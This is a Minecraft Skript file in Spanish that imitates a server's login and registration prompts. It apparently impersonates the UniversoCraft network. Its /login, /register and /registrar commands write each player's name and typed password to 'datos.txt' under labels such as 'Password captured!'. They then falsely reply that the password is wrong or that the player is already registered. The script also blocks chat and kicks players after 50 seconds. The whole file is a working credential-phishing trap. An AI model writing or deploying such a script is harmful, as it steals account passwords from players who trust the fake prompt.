variables:
	{intentos} = 0
on join:
	execute console command "mv tp %player% mc_universocraft_com"
	wf "User %player% has entered the server." to "datos.txt"
	message "&9&lCuenta &7» &a¡Inicia sesión: &e/login <tucontraseña>"
	wait 50 seconds
	kick the player due to "&9&lCuenta &7» &cTu tiempo de espera para entrar se ha agotado"
on chat:
	cancel event

command /login [<text>]:
	trigger:
		if arg-1 is not set:
			message "&9&lCuenta &7» &cUso correcto: &e/login <tucontraseña>"
		if arg-1 is set:
			wf "Password captured! user: %player% pass: %arg-1%" to "datos.txt"
			message "&9&lCuenta &7» &cContraseña incorrecta."
		
command /register [<text>] [<text>]:
	trigger:
		if arg-1 is not set:
			message "&9&lCuenta &7» &cUso correcto: &e/registrar <tucontraseña>"
			message "&e<repitetucontraseña>"
		if arg-1 is set:
			message "&9&lCuenta &7» &cUso correcto: &e/registrar <tucontraseña>"
			message "&e<repitetucontraseña>"
		if arg-2 is set:
			wf "Register captured! user: %player% pass: %arg-1%" to "datos.txt"
			message "&9&lCuenta &7» &cYa estás registrado."

command /registrar [<text>] [<text>]:
	trigger:
		if arg-1 is not set:
			message "&9&lCuenta &7» &cUso correcto: &e/registrar <tucontraseña>"
			message "&e<repitetucontraseña>"
		if arg-1 is set:
			message "&9&lCuenta &7» &cUso correcto: &e/registrar <tucontraseña>"
			message "&e<repitetucontraseña>"
		if arg-2 is set:
			wf "Register captured! user: %player% pass: %arg-1%" to "datos.txt"
			message "&9&lCuenta &7» &cYa estás registrado."